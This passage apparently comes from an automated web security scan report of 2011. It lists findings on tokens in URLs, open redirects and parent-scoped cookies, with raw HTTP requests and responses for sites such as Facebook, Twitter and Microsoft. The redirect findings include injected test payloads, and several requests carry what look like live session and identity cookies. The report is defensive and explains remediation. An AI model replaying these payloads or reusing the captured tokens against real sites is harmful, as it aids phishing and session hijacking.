<noscript>[<a href="help.html?helpid=[DASID_4941]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_4941">Info</a>
...[SNIP]...
<noscript>[<a href="help.html?helpid=[DASID_2541]&sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="ONLINE_HELP_2541">Info</a>
...[SNIP]...
<div align="center" class="e5_contentsmall" id="e5_lnk_cho_fax"><a href="faxorder.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" >I prefer to order by fax</a>
...[SNIP]...
<p align="center" class="e5_contentsmall" id="e5_lnk_cho_support"><a href="http://ccc.shareit.com/ccc/index.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">Customer Service</a>
...[SNIP]...
<noscript>
<a href="https://secure.shareit.com/shareit/impressum.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">
</noscript>
...[SNIP]...
<noscript>
<a href="https://secure.shareit.com/shareit/privacypolicy.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">
</noscript>
...[SNIP]...
<noscript>
<a href="https://secure.shareit.com/shareit/termsconditions.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406" target="_blank">
</noscript>
...[SNIP]...
12.27. https://secure.shareit.com/shareit/checkout.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Content-Length: 371
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_CO
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:26 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 69671

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
12.28. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df88474c98%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df2dd5d0f98%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfde8aea0c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df163784e44%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c9c353c8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff94930be8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2dd5d0f98&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Daolnews.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.aolnews.com%252F2011%252F03%252F24%252Fcaseworkers-charged-in-death-of-marchella-brett-pierce-abused-4%252F%26extra_2%3DUS; wd=150x21

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f163784e44&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff94930be8&relation=parent&transport=postmessage&frame=f2dd5d0f98
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.116
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:06 GMT
Content-Length: 0

13. Open redirection  previous  next
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

13.1. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a9bad5fe736ff6f2a/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035740&d.c=http%3a//a9bad5fe736ff6f2a/a%3fgif&d.o=desoundings&d.x=95494307&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%27%2BNSFTW%2B%27%3Fordering%3D%26searchphrase%3Dall HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a9bad5fe736ff6f2a/a?gif
Date: Fri, 25 Mar 2011 19:13:37 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 24-Mar-2013 19:13:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.2. http://www.global-bd.net/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.global-bd.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aa4f367ad0071cc5a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /?.aa4f367ad0071cc5a/=1 HTTP/1.1
Host: www.global-bd.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 28 Mar 2011 01:20:27 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Location: http://www.aamranetworks.com?.aa4f367ad0071cc5a/=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 304

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.aamranetworks.com?.aa4f367ad0071cc5a/=1
...[SNIP]...
14. Cookie scoped to parent domain  previous  next
There are 31 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

14.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=msnewengland&callback=twitterCallback2&count=2&include_rts=1&_=1301103779884 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; guest_id=130064046899387316; k=173.193.214.243.1300731765883613; __utma=43838368.1964851609.1298770586.1300971947.1300975461.10; __utmv=43838368.lang%3A%20en; original_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBf%2Fd0TAuDdsZHwWvM44%2FzlWv%2FtyZQehRjs; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPPG0e8uAToHaWQiJTk5YjAyNzEwYzgzNWY1%250AMGE5ZmU0MmVhODljZTI1Y2MwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--669a5eee1365b7a9d96d8bb2845f0dc57358ae52

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:42:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1301103732-79367-51873
X-RateLimit-Limit: 150
ETag: "0ccaff783db89e621d4d4a5f38152979"-gzip
Last-Modified: Sat, 26 Mar 2011 01:42:12 GMT
X-RateLimit-Remaining: 146
X-Runtime: 0.01684
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1301107225
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPPG0e8uAToHaWQiJTk5YjAyNzEwYzgzNWY1%250AMGE5ZmU0MmVhODljZTI1Y2MwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--669a5eee1365b7a9d96d8bb2845f0dc57358ae52; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 3642
Connection: close

twitterCallback2([{"text":"#NERDWHM Fact: Gertrude Elion co-developed two drugs that fought leukemia and developed the 1st immunosuppressant agent http:\/\/bit.ly\/hUpF0M","id_str":"51376473172484096"
...[SNIP]...
14.2. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&cs=1&ti=Microsoft%20Trademarks&si=1&sv=4.0&fi=1&fv=10.2&r=http%3A%2F%2Fwww.microsoft.com%2Flibrary%2Ftoolbar%2F3.0%2Ftrademarks%2Fen-us.mspx&ts=1301101086935&sr=1920x1200&bs=1410x15089 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/About/Legal/EN/US/IntellectualProperty/Trademarks/EN-US.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/22/2011 21:02:41&Microsoft.VisitStartDate=03/22/2011 21:02:41&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=22&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1300816975750:ss=1300816958515; MS0=38ceddfa393547488a60161c1088230a

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=603b4bae-c040-4de3-9137-6b3b928992ac&Microsoft.CreationDate=03/26/2011 00:57:21&Microsoft.LastVisitDate=03/26/2011 00:58:51&Microsoft.NumberOfVisits=2&SessionCookie.Id=D4A72B621B01025B4D713B5DF725DB36; domain=microsoft.com; expires=Sat, 26-Mar-2011 01:28:51 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:58:51&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=24&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; domain=microsoft.com; expires=Sun, 25-Mar-2012 00:58:51 GMT; path=/
Set-Cookie: MS0=38ceddfa393547488a60161c1088230a; domain=.microsoft.com; expires=Sat, 26-Mar-2011 01:28:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:58:51 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
14.3. https://www.plimus.com/jsp/buynow.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.plimus.com
Path:   /jsp/buynow.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsp/buynow.jsp?contractId=1947672 HTTP/1.1
Host: www.plimus.com
Connection: keep-alive
Referer: http://www.fast-report.com/bitrix/redirect3.php?GOTO=https%3A%2F%2Fwww.plimus.com%2Fjsp%2Fbuynow.jsp%3FcontractId%3D1947672%26GID%3DBITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: contractId=2950920; sessionId=web41946268920227930; __utmz=254660169.1299810311.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=254660169.313124860.1299810311.1299810311.1299810311.1

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:12:13 GMT
Server: Apache
Set-Cookie: contractId=1947672; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Set-Cookie: sessionId=web48546432239533572; Domain=.plimus.com; Expires=Tue, 20-Mar-2012 17:12:13 GMT; Secure
Keep-Alive: timeout=5, max=150
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 188883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<tit
...[SNIP]...
14.4. http://a1.bing4.com/fd/fb/simls  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.bing4.com
Path:   /fd/fb/simls

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fd/fb/simls?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_02_0_865148%26sId%3D5%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: a1.bing4.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_02_0_865148&sId=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=5A3DD7A43C5B43BB87A565DA84737466; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110313; _SS=SID=9B679FC2C38D46A6AEF54858BDEBEE5C; _HOP=I=1&TS=1301101465

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/fd/fb/u?v=7_02_0_865148&sId=5#status=unknown
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 01:05:26 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1301101526; domain=.bing4.com; path=/

14.5. http://api.flickr.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /clientaccesspolicy.xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: api.flickr.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=59mpc5d6lt8hn&b=3&s=c8; localization=en-us%3Bus%3Bus

Response

HTTP/1.0 404 Not Found
Date: Sat, 26 Mar 2011 01:40:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 25-Mar-2014 01:40:32 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 26-Mar-2010 01:40:31 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 26-Mar-2010 01:40:31 GMT; path=/; domain=flickr.com
X-Served-By: www20.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 2211
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Flickr API: Page not found</title>
   <link href="http://l.yimg.com/g/css/c_flickr.css.v101414.17" rel="styleshe
...[SNIP]...
14.6. http://b.aol.com/vanity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.aol.com
Path:   /vanity/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vanity/?ts=1301171798557&h=www.aol.com&v=10&t=AOL.com%20-%20News%2C%20Sports%2C%20Weather%2C%20Entertainment%2C%20Local%20%26%20Lifestyle&r=&l=0&ms=1&dL_ch=us.aolportal&dL_dpt=main5%20AOL.com%205.0%20Main&template=maing-grid7&cobrand=main5&plids=43050%7Cwelcome-messaging%7Cnull%7C2%2C50380%7Ctrending-stories%7Ccol3%7C7%2C31799%7Csign-in-sign-out%7Cnull%7C3%2C12666%7Cbrand-6%7Cfooter%7C1%2C10699%7Cbrand-5%7Cfooter%7C1%2C51754%7Cqnav-radio%7Cnull%7C7%2C8821%7Cbrand-8%7Cfooter%7C1%2C51659%7Cspecial-events-11%7Ccol3%7C4%2C51753%7Cqnav-aim%7Cnull%7C7%2C51734%7Cfooterlinks%7Cfooter%7C2%2C10694%7Cbrand-1%7Cfooter%7C1%2C51932%7Cdaily-buzz4%7Ccol2%7C2%2C42766%7Cfeatured-brands%7Cfooter%7C1%2C51933%7Cdaily-buzz2%7Ccol2%7C2%2C20322%7Cweather%7Cnull%7C4%2C8903%7Cbrand-7%7Cfooter%7C1%2C18826%7Centertainment-news%7Ccol1R%7C6%2C51729%7Cdirectory%7Ccol1L%7C1%2C48051%7Cfollow-me-module%7Ccol3%7C6%2C51771%7Cstandalonevj%7Ccol2%7C1%2C8897%7Cbrand-9%7Cfooter%7C1%2C50259%7Cspecial-events-12%7Ccol3%7C4%2C8899%7Cbrand-3%7Cfooter%7C1%2C8875%7Cbrand-4%7Cfooter%7C1%2C50033%7Cmore-news%7Ccol1R%7C1%2C49721%7Cmore-news%7Ccol1R%7C1%2C51114%7Ctrending-stories-feed%7Ccol3%7C7%2C51822%7Cdaily-buzz5%7Ccol2%7C2%2C22965%7Centertainment-news%7Ccol1R%7C6%2C47495%7Cstock-markets-interestrates%7Ccol1R%7C3%2C42552%7Clogo%7Cnull%7C5%2C51824%7Cdaily-buzz1%7Ccol2%7C2%2C51905%7Cdaily-buzz3%7Ccol2%7C2%2C51906%7Csports-news%7Ccol1R%7C5%2C51721%7Cprodsvcs%7Ccol1L%7C2%2C51915%7Clocal%7Ccol1R%7C2%2C51785%7Ctrending-now%7Ccol3%7C8%2C51148%7Cvideo-promo2%7Ccol3%7C9%2C51937%7Cdl1%7Cdl-wide%7C1%2C8826%7Cbrand-2%7Cfooter%7C1%2C51144%7Cvideo-promo1%7Ccol3%7C9%2C48762%7Cbusiness-news%7Ccol1R%7C4%2C47438%7Cqnav-mail%7Cnull%7C7%2C51145%7Cvideo-promo3%7Ccol3%7C9%2C51886%7Cbusiness-news%7Ccol1R%7C4%2C51142%7Cvideo-feature%7Ccol3%7C9 HTTP/1.1
Host: b.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
